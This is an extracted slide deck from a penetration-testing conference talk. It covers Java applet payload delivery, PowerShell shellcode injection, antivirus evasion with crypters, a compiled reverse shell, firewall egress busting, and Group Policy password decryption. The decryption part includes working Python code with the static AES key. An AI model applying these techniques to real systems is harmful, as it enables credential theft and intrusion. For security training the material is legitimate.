BSIDES Las Vegas Secret Pentesting Techniques Shhh...

Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com @TrustedSec

Introduc)on  
•  As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. •  Although some may or may not be public, they are generally obscure and not well known.

•  The purpose of today’s talk is to show you my secrets.. Some of my techniques that I use that aren’t widely known. •  Why show you? I’m an open book on everything I do and sharing is what it’s all about.

Technique  #1  
•  Java Applet Attack (SET) – Well known attack method right? •  Do you know how it actually works? •  Do you know the techniques behind it to make it successful?

ZOMG  APT  
•  News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. •  Made me feel kind of special =) •  How people found out it was set?

ILIKEHUGS   .

DEMO: Walking through the Attack .

. •  Parameters tell the Applet which attacks to use. •  Obfuscated and randomized each time.Explaining  the  Applet   •  Parameters that are injected into the HTML code are pulled from the Applet.

Method  1  –  Binary  Dropper   •  Binary is downloaded from attacker machine via web server (Java downloader) •  Obfuscated binary each time per deployment.. and rewriting binary on fly (import pefile) . Combination of PE manipulation. UPX.

DEMO: Binary Dropping Technique .

. (SET changes them each version) •  Direct interaction with Windows file system and writing to disk. •  Multiple points of evidence on victim machine.Method  1  –  Weak  Sauce   •  Binary’s are easily picked up by AV if signatures focus on obfuscation techniques.

Uses VirtualAlloc for read. char*argv[]) parameter for alphanumeric shellcode. write. . and execute memory space.Method  2  –  Shellcodeexec   •  Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. •  Executable takes int main(int argc. •  Alphanumeric shellcode is executed in memory and payload is delivered.

DEMO: ShellcodeExec .

•  Like Method 1 – Binary’s can be picked up unless custom version created.Method  2  –  Easily  detectable   •  Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Direct interaction with Windows file system and writing to disk. •  Like Method 1 . .Multiple points of evidence on victim machine.

•  Technique discovered by Matthew Graeber (you rock). .Method  3  –  Powershell  Injec)on   •  Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). •  Powershell gives us complete flexibility on a number of post exploitation situations.

Method  3  –  PS  ShellCode  Injec)on   •  Applet detects if powershell is installed on system. . •  Grabs the operating system type (x86 / x64) •  Deploys Shellcode straight through powershell.

DEMO: ShellcodeExec .

•  Extremely reliable and stable. •  Obfuscated each time so that memory inspection is extremely difficult. .Method  3  –  Powershell  Injec)on   •  Never touches disk – AV / HIPS signatures go out the door.

PE Security Evasion .

•  Most cases.Scenario  1  –  Dropping  PE’s  like  its  hot   •  Your using Metasploit – All of them are being picked up by AV. I will rewrite the exe template for Metasploit to customize binary for evasion. etc. . •  Couple cool ways to do this. HIPS.

.rb template and obfuscate the code that way.Modifying  PE  For  Evasion  in  MSF   •  Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode. •  You can also modify the Metasploit exe.

it brute forces the AES key then decrypts the PE file for you. •  When executable is run. . •  Encrypts PE the file using a randomized simple cipher key with AES 128.net).PE  Crypters   •  One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.

DEMO: Hyperion .

•  Ability to have a completely unique PE file each time.Hyperion  Encryp)on   •  Very cool concept and easy to use and write one for yourself. . •  Slight downfall. stub used for brute force is not polymorphic.

Building a Simple Reverse Shell .

The  Reverse  Shell   •  Connects out to the attacker (reverse shell). .

python Configure.spec cd shell\dist .py –onefile –noconsole shell. and Windows.py python Makespec. OSX. •  Works on Linux.Compiling  Binaries   •  PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable.py shell/shell.py python Build.

.Making  it  easy  –  pybuild.py   •  All code and samples will be released on the TrustedSec website soon.

DEMO: Building a Shell .

Bypassing  AV   .

Finding your way home .

Bumping  the  Firewall   •  A number of companies restrict ports outbound and only allow what’s needed for the business. especially if you only have one shot. •  Trouble getting payloads out. .

•  Attempt staged reverse on every port. •  Metasploit has an ALLPORTS payload as well. .Egress  Bus)ng   •  Few ways to do it. pre-staged payload for identifying way out.

Egress  Buster  0. . •  Here’s where you can have some fun. •  Server listens for connection and reports back.2   •  Server/Client situation where victim connects out on every port 1024 ports at a time.

Egress Buster Reverse Shell .

Egress  Buster  Reverse  Shell   •  Released this week! •  Allows you to bust all ports inside the firewall and spawn a command shell. so no AV picks this up. •  Custom. . Byte compiled into an executable.

DEMO: Egress Buster Reverse Shell .

e. •  Wrote this to deploy and found several obscure ports that were allowed. 25. 443.Egress  Buster  Reverse  Shell  Usage   •  Recent Penetration Test – Found file upload + execute binary’s. etc. 53. 80. . •  Could not find a standard port out i.

Fun with Group Policy .

com/ exploiting-windows-2008-group-policypreferences .One  of  my  PERSONAL  Favorites   •  How many times have we been on a pentest with just a domain user? •  Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.

The  AZack   •  Navigate to a domain controller and hit up the SYSVOL share. •  Look for the Groups.xml file. •  Look for a GUID then MACHINE \Preferences\Group. . •  Head to the domain name and Policies folder.

Contents  of  File   .

Sta)c  Key  for  AES  Anyone?   .

replace("\n".Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.sogeti."").new(key."").replace(" ". 2).decode('hex') cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=") o = AES.decrypt(cpassword) print o[:-ord(o[-1])].com/exploiting-windows-2008-group-policy-preferences from Crypto.decode('utf16') .Python  Code   # code was developed and created from # http://esec-pentest.

decode('utf16') Local*P4ssword! .Decrypted  Password   >>> print o[:-ord(o[-1])].

Expanding on Group.xml .

More  Passwords  Stored   •  The folks over at rewt dance ( http://rewtdance. ScheduledTasks. .blogspot. SQL servers and much more are impacted.com/ 2012/06/exploiting-windows-2008group-policy. •  Services.html) found a few more areas that store passwords using the cpassword attribute.

com/en-us/library/dd341350(v=prot.13) http://msdn.13) DataSources\DataSources.13) http://msdn.com/en-us/library/cc980070(v=prot.microsoft.microsoft.com/en-us/library/dd304114(v=prot.com/en-us/library/cc422920(v=prot.com/en-us/library/cc422918(v=prot.xml http://msdn.xml http://msdn.13) .microsoft.xml http://msdn.xml http://msdn.microsoft.13) Drives\Drives.microsoft.com/en-us/library/cc422926(v=prot.com/en-us/library/cc704598(v=prot.microsoft.microsoft.13) Printers\Printers.xml http://msdn.List  of  Other  Affected  Areas  (from  rewt   dance)   Services\Services.13) ScheduledTasks\ScheduledTasks.

.There’s a ton more of these… Hopefully can make these a series.

.

com and click on the Downloads. head over to https://www.Downloads   For the code and tools used in this presentation.trustedsec. .

com https://www.trustedsec.. Principal Security Consultant Email: davek@trustedsec.com TrustedSec.Secret Pentesting Techniques Shhh. Dave Kennedy Founder.. LLC @TrustedSec .

Sign up to vote on this title
UsefulNot useful